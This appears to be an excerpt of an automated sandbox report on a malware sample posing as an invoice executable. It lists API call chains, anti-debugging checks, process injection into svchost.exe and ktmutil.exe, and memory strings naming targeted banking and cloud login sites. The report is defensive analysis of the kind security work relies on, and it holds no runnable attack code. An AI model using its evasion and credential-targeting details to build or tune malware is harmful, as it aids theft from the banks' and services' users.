                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00236CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00236CA9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_002360DD
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_002363F9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0023EB60
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023F56F FindFirstFileW,FindClose,2_2_0023F56F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0023F5FA
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00241B2F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00241C8A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00241F94
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0279C810 FindFirstFileW,FindNextFileW,FindClose,11_2_0279C810
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0020DDC0
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,116
                Source: 283026M3L.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 283026M3L.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtal.azure.comVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 283026M3L.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 283026M3L.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 283026M3L.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552x
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552n
                Source: 283026M3L.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 283026M3L.11.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3403128496.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 283026M3L.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696487552h
                Source: 283026M3L.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552~
                Source: firefox.exe, 00000010.00000002.2800681356.000001C39761C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,1169648755
                Source: 283026M3L.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tion PasswordVMware20,11696487552}
                Source: 283026M3L.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 283026M3L.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 283026M3L.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,
                Source: 283026M3L.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 283026M3L.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 283026M3L.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 283026M3L.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 283026M3L.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 283026M3L.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 283026M3L.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeAPI call chain: ExitProcess graph end nodegraph_2-92623
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7096E rdtsc 4_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417A83 LdrLoadDll,4_2_00417A83
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246AAF BlockInput,2_2_00246AAF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_001F3D19
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00223920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00223920
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020E01E LoadLibraryA,GetProcAddress,2_2_0020E01E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00E28038 mov eax, dword ptr fs:[00000030h]2_2_00E28038
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00E269B8 mov eax, dword ptr fs:[00000030h]2_2_00E269B8
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00E27FD8 mov eax, dword ptr fs:[00000030h]2_2_00E27FD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h]4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h]4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h]4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5438F mov eax, dword ptr fs:[00000030h]4_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5438F mov eax, dword ptr fs:[00000030h]4_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h]4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h]4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h]4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h]4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A663FF mov eax, dword ptr fs:[00000030h]4_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEC3CD mov eax, dword ptr fs:[00000030h]4_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h]4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h]4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h]4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h]4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB63C0 mov eax, dword ptr fs:[00000030h]4_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD43D4 mov eax, dword ptr fs:[00000030h]4_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD43D4 mov eax, dword ptr fs:[00000030h]4_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h]4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h]4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h]4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C310 mov ecx, dword ptr fs:[00000030h]4_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A50310 mov ecx, dword ptr fs:[00000030h]4_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD437C mov eax, dword ptr fs:[00000030h]4_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov ecx, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFA352 mov eax, dword ptr fs:[00000030h]4_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD8350 mov ecx, dword ptr fs:[00000030h]4_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E284 mov eax, dword ptr fs:[00000030h]4_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E284 mov eax, dword ptr fs:[00000030h]4_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2823B mov eax, dword ptr fs:[00000030h]4_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2826B mov eax, dword ptr fs:[00000030h]4_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB8243 mov eax, dword ptr fs:[00000030h]4_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB8243 mov ecx, dword ptr fs:[00000030h]4_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A250 mov eax, dword ptr fs:[00000030h]4_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36259 mov eax, dword ptr fs:[00000030h]4_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70185 mov eax, dword ptr fs:[00000030h]4_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEC188 mov eax, dword ptr fs:[00000030h]4_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEC188 mov eax, dword ptr fs:[00000030h]4_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4180 mov eax, dword ptr fs:[00000030h]4_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4180 mov eax, dword ptr fs:[00000030h]4_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B061E5 mov eax, dword ptr fs:[00000030h]4_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A601F8 mov eax, dword ptr fs:[00000030h]4_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF61C3 mov eax, dword ptr fs:[00000030h]4_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF61C3 mov eax, dword ptr fs:[00000030h]4_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60124 mov eax, dword ptr fs:[00000030h]4_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov ecx, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF0115 mov eax, dword ptr fs:[00000030h]4_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov ecx, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C156 mov eax, dword ptr fs:[00000030h]4_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC8158 mov eax, dword ptr fs:[00000030h]4_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36154 mov eax, dword ptr fs:[00000030h]4_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36154 mov eax, dword ptr fs:[00000030h]4_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC80A8 mov eax, dword ptr fs:[00000030h]4_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF60B8 mov eax, dword ptr fs:[00000030h]4_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]4_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3208A mov eax, dword ptr fs:[00000030h]4_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A380E9 mov eax, dword ptr fs:[00000030h]4_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB60E0 mov eax, dword ptr fs:[00000030h]4_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]4_2_03A2C0F0
